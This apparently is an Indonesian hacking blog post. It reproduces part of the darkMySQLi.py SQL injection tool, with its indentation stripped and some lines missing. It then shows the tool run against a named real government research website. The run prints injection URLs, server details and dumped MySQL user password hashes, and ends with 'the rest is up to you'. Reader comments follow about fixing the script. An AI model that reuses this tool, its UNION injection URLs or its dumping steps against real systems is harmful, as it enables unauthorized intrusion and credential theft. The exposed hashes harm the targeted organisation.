yesno = "YES <-- w00t w00t\n[!] Retrieve Info: --dump -D mysql -T user -C user,password"
yesno = "NO"
print "\n[+] Do we have Access to MySQL Database:",yesno;file.write("\n\n[+] Do we have Access to MySQL Database: "+str(yesno))
print "\n[+] Showing database version, username@location, and database name!"
file.write("\n\n[+] Showing database version, username@location, and database name!")
line_URL = site+"+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),"
row_value = 1

#Lets Count how many rows or columns
if mode == "--schema" or mode == "--dump" or mode == "--dbs" or mode == "--full":
if arg_blind == "--blind":
row_value = GuessValue(count_URL)
source = GetThatShit(count_URL)
match = re.findall("\x1e\x1e\S+",source)
match = match[0][2:].split("\x1e")
row_value = match[0]
print "[+] Number of "+arg_row+": "+str(row_value);file.write("\n[+] Number of "+arg_row+": "+str(row_value)+"\n")

## UNION Schema Enumeration and DataExt loop
if arg_blind == "--union":
if mode == "--schema" or mode == "--dump" or mode == "--dbs" or mode == "--full":
while int(table_num) != int(row_value):
source = GetThatShit(line_URL.replace("NUM",str(num)))
match = re.findall("\x1e\x1e\S+",source)
if len(match) >= 1:
if mode == "--schema" or mode == "--full":
match = match[0][2:].split("\x1e")
if cur_db != match[0]:
cur_db = match[0]
if table_num == 0:
print "\n[Database]: "+match[0];file.write("\n[Database]: "+match[0]+"\n")
print "\n\n[Database]: "+match[0];file.write("\n\n[Database]: "+match[0]+"\n")
print "[Table: Columns]";file.write("[Table: Columns]\n")
if cur_table != match[1]:
print "\n["+str(table_num+1)+"]"+match[1]+": "+match[2],
file.write("\n["+str(table_num+1)+"]"+match[1]+": "+match[2])
cur_table = match[1]
table_num = int(table_num) + 1
sys.stdout.write(",%s" % (match[2]))
#Gathering Databases only
elif mode == "--dbs":
match = match[0]
if table_num == 0:
print "\n["+str(num+1)+"]",match;file.write("\n["+str(num+1)+"]"+str(match))
print "["+str(num+1)+"]",match;file.write("\n["+str(num+1)+"]"+str(match))
#Collect data from tables & columns
elif mode == "--dump":
match = re.findall("\x1e\x1e+.+\x1e\x1e",source)
if match == []:
match = ['']
match = match[0].strip("\x1e").split("\x1e")
if arg_rowdisp == 1:
print "\n["+str(num+1)+"] ",;file.write("\n["+str(num+1)+"] ",)
for ddata in match:
if ddata == "":
ddata = "NoDataInColumn"
sys.stdout.write("%s:" % (ddata))
file.write("%s:" % ddata)
if mode == "--dump":
sys.stdout.write("\n[%s] No data" % (num))
file.write("\n[%s] No data" % (num))
except (KeyboardInterrupt, SystemExit):

## Blind Schema Enumeration and DataExt loop
if arg_blind == "--blind":
if mode == "--schema" or mode == "--dbs" or mode == "--dump" or mode == "--info":
lower_bound = 0
upper_bound = 127
for data_row in range(int(num), row_value):
sys.stdout.write("[%s]: " % (lim_num))
file.write("\n[%s]: " % (lim_num))
value = chr(upper_bound)
while value != chr(0):
if mode == "--info":
Guess_URL = line_URL + str(let_pos)+",1))"
Guess_URL = line_URL + str(lim_num) +",1),"+str(let_pos)+",1))"
value = chr(GuessValue(Guess_URL))
sys.stdout.write("%s" % (value))
lim_num = int(lim_num) + 1
let_pos = 1

#Lets wrap it up!
if mode == "--schema" or mode == "--full" or mode == "--dump":
print "\n\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X"))
print "\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X"))
print "[-] Total URL Requests:",gets;file.write("\n[-] Total URL Requests: "+str(gets))
print "[-] Done\n";file.write("\n[-] Done\n")
print "Don't forget to check", logfile,"\n"

atau download source-code nya disini atau disini.

target kali ini adalah http://www.inovasi.lipi.go.id/hki/news/news.php?id=37
C:\Python25>darkmysqli.py --findcol -u http://www.inovasi.lipi.go.id/hki/news/news.php?id=37

| rsauron@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |

[+] URL: http://www.inovasi.lipi.go.id/hki/news/news.php?id=37
[+] 13:16:13
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
[+] Building Proxy List...
Proxy: - Success
[+] Proxy List Complete
[+] Attempting To find the number of columns...
[+] Testing: 1,2,3,4,5,6,
[+] Column Length is: 6
[+] Found null column at column #: 3,5,6,

[!] SQLi URL: http://www.inovasi.lipi.go.id/hki/news/news.php?id=37+AND+1=2+UNION+SELECT+1,2,3,4,5,6--
[!] darkMySQLi URL: http://www.inovasi.lipi.go.id/hki/news/news.php?id=37+AND+1=2+UNION+SELECT+1,2,darkc0de,4,darkc0de,darkc0de--

[-] [13:16:23]
[-] Total URL Requests: 6
[-] Done

C:\Python25>darkmysqli.py --info -u http://www.inovasi.lipi.go.id/hki/news/news.php?id=37+AND+1=2+UNION+SELECT+1,2,darkc0de,4,darkc0de,darkc0de--

| rsauron@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |

[+] URL: http://www.inovasi.lipi.go.id/hki/news/news.php?id=37+AND+1=2+UNION+SELECT+1,2,darkc0de,4,darkc0de,darkc0de
[+] 13:17:37
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[+] Building Proxy List...
Proxy: - Success
[+] Proxy List Complete
[+] Gathering MySQL Server Configuration...
Database: sean1
User: root@localhost
Version: 5.0.51a-24+lenny1

[+] Do we have Access to MySQL Database: YES <-- w00t w00t
[+] Dumping MySQL user info. host:user:password
[+] Number of users in the mysql.user table: 6 [0] localhost:root:*FBB2F1A7A07597D81C29AC53EB2634032F634CDE [1] pusinov:root:*FBB2F1A7A07597D81C29AC53EB2634032F634CDE [2]*FBB2F1A7A07597D81C29AC53EB2634032F634CDE [3] localhost:debian-sys-maint:*BBEFC3D4873B792A18EABB33ADF4B97C3B57DB48 [4] pusinov:admin:*8FCC004418F144E3AF026CF0C932380CD6FBB687 [5] localhost:admin:*8FCC004418F144E3AF026CF0C932380CD6FBB687 [+] Do we have Access to Load_File: YES <-- w00t w00t [-] [13:18:06] [-] Total URL Requests: 11
[-] Done

C:\Python25>darkmysqli.py --dbs -u http://www.inovasi.lipi.go.id/hki/news/news.php?id=37+AND+1=2+UNION+SELECT+1,2,darkc0de,4,darkc0de,darkc0de--

| rsauron@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |

[+] URL: http://www.inovasi.lipi.go.id/hki/news/news.php?id=37+AND+1=2+UNION+SELECT+1,2,darkc0de,4,darkc0de,darkc0de
[+] 13:19:50
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Opera/8.00 (Windows NT 5.1; U; en)
[+] Building Proxy List...
Proxy: - Success
[+] Proxy List Complete
[+] Gathering MySQL Server Configuration...
Database: sean1
User: root@localhost
Version: 5.0.51a-24+lenny1
[+] Showing all databases current user has access too!
[+] Number of Databases: 7


[-] [13:20:02]
[-] Total URL Requests: 9
[-] Done

Selanjutnya terserah anda :)

2 komentar:

ngr3p0tib0y mengatakan...

darkMySQLi.py nya tak copy paste trus tak running di phyton g bisa

ada yang error syntax nya om


defacement88 mengatakan...

masa sih?
coba liat lagi blog saya. udah saya cantumkan alternate link download source code-nya


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